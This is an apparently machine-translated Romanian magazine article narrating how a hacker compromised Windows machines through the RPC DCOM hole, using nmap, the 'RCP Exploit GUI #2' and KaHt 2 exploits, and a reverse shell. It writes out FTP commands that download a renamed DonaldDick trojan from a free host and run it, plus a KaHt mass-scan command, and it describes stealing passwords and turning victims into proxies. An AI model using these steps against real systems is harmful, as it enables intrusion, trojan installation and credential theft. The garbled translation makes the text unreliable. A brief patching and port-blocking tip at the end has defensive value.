Întregul adevăr despre vulnerabilitățile rcc dcom

Vulnerabilitatea era totuși descurajantă
Un exploatare gata nu era disponibilă
cea mai mare parte a oamenilor ... Probabil prin urmare
nimeni nu a simțit frica ...

Dar, după câteva ore, rapoartele Todd Sabin,






că toate serviciile RPC sunt vulnerabile. Asta este
înseamnă că configurarea firewall-ului pentru
închiderea portului 135 nu este suficientă
mijloace de protecție. Pericolele sunt expuse
calculatoare cu deschidere 135 (UDP / TCP), 139, 445 și 593
porturi. Acoperirea media a acestei erori, ca
risc potențial de securitate
Utilizatorii Windows. A fost o lume globală
catastrofă. Dar din public
Explozia nu a fost eliberată, toată lumea a continuat
trăiesc vechea mea viață fără să mă gândesc
consecințele apariției sale în rândul maselor.

Dar nu toți au reacționat atât de pasiv
apariția acestei vulnerabilități. hackeri
treptat a început să scrie privat
Exploatații și copiii scripturilor au continuat să îl aștepte
aspectul. Rezultatul nu a durat mult
să aștepte. În câteva zile, există
unele evoluții în acest domeniu,
există prime exploatații. cu toate acestea
majoritatea provoacă un eșec
pe sistemul la distanță. Ceea ce poate fi explicat,
pentru că detaliile tehnice despre
Vulnerabilitatea nu a fost cunoscută. deși
unele versiuni de OS sunt deja de succes
au fost exploatate.

În acest moment era masivul
Atac de hackeri asupra utilizatorilor obișnuiți.
În plus, a existat un vierme Internet MS Blast,
care pătrundeau ușor pe calculatoare
conectat la Internet și chiar în
rețelele corporative ale celor mai mari companii
a lumii. Totul era în pericol ...

Atacul unei mașini la distanță nu este
munca specială. Prin urmare, copiii scripturilor au luat-o
propria afacere. Furt de carduri de credit și private
Exploatările au crescut de mai multe ori. și
multe segmente gustoase ale rețelei de oțel
pentru gustul gustului. Asta am făcut
un hacker. El a vrut mult timp să profite de server,
ci o vulnerabilitate decentă față de aceasta înainte de aceasta
nu a fost. Și nu folosiți astfel
un dar al soartei, pur și simplu nu putea.

Un joc în trei fapte

Primul lucru pe care trebuia să îl facă înainte
atac, este de a verifica care dintre ele
Sistemul de operare este instalat pe
server. Pentru asta el a folosit






utilitate nmap. Hackerul a scris deja despre ea
oportunități, dar repet și spun asta
este folosit pentru a determina versiunea sistemului de operare
pe computerul la distanță. Din fericire, ea
există pentru Windows și * nix. A
ca hacker pentru munca sa
folosit Windows, atunci alegerea lui a căzut
versiunea grafică a nmap.

Câteva minute de funcționare a scanerului și
rezultatul este pozitiv. 135 portul a fost
deschis și nu protejat de un firewall. Asta este
a fost începutul sfârșitului, începutul mult așteptatului
atac. În acest moment, a fost deja scris
multe exploatații, inclusiv "RCP Exploit GUI # 2".
Trăsătura sa distinctivă a fost aceea că el
a avut o interfață grafică și a conținut
funcții de scanare auto-construite
Interval IP și server FTP.

Sistemul sa predat fără vreunul
incidente, astfel încât hackerul avea o cochilie inversă
cu serverul de la distanță. Acum că putea
să facă ceva pe el
timp pentru a instala Troian. Printre zonele mari
numărul de posibile, a fost ales DonaldDick. pentru
Trebuia să-și pună în aplicare planul
Obțineți hosting pe un server gratuit cu
Suport FTP. Complet abordat BY.RU, și anume
acolo a încărcat serverul pentru troian. acum,
Când DonaldDick a devenit disponibil prin FTP, el sa întors
a luat victima sau, mai degrabă, a început să injecteze
serverul troian pe el. A fost bine
plan bine gândit, din moment ce vulnerabilitatea
ar putea patch-uri, și el troian în Africa
Cal troian. Apelarea în consola ftp a început
încărcați un fișier. Întregul proces a fost luat de la el,
scriind doar cinci rânduri:

deschideți prin.ru
imya_servera.by.ru
parolă
obțineți fooware.exe
pa

În cazul în care fooware.exe este serverul redenumit pentru
DonaldDick. Când fișierul a fost descărcat, este lăsat
rulați-o. Pentru aceasta, el pur și simplu
a scris numele fișierului (fooware.exe) și cu plăcere
Apăsați Enter ... După aceea, hackerul sa confortabil
controlul asupra serverului.

Dar știi cum se întâmplă mereu când
găsiți ceva interesant cu care continuați
această piesă. Deci, Hackerul nostru a vrut
obțineți mai mult de un sistem. Privind,
că exploatează KaHt
2 permite o masivă
scanare, el a luat de lucru, sau mai degrabă
pentru lucrare a luat KaHt. Utilizarea sa
nu a fost dificil. Deci, de exemplu,
despre scanarea rețelei cu IP 192.168.0. * (clasa C), către el
a fost necesar să tastați "KaHt.exe 129.168.0.1
192.168.0.254 "Ce anume a făcut,
după care a verificat periodic
rezultate. Deci a avut acces
la chiar și mai mulți utilizatori, de la
care au reușit apoi să obțină parole pentru
servicii diferite, poștă și multe altele
informații utile. Să nu mai vorbim de faptul că,
că a început să-i folosească pe mulți dintre ei
proxy anonim.

Mâncare pentru gândire

Deși Microsoft a lansat mult timp un patch,
utilizatorii și administratorii nu se grăbesc
patch-uri, în speranța că rețeaua lor nu este
nu va fi de interes pentru nimeni. Dar acești hackeri
Un număr mare și instalarea plasturelui este
mai degrabă o necesitate decât o oportunitate.
De asemenea, puteți bloca toate pachetele primite
la porturile 135, 139, 445 și 593.

Firește, tot acest hacker a trecut prin
anonim proxy, și, în consecință, curățate
urme de prezență în sistem. Dar tu
ar trebui să se gândească înainte de a repeta
exploatările lui. La urma urmei, sunt luate în considerare astfel de acțiuni
ilegale și se poate încheia
esti destul de deplorabil ...

Distribuiți acest articol cu ​​prietenii dvs.:







Articole similare

Trimiteți-le prietenilor: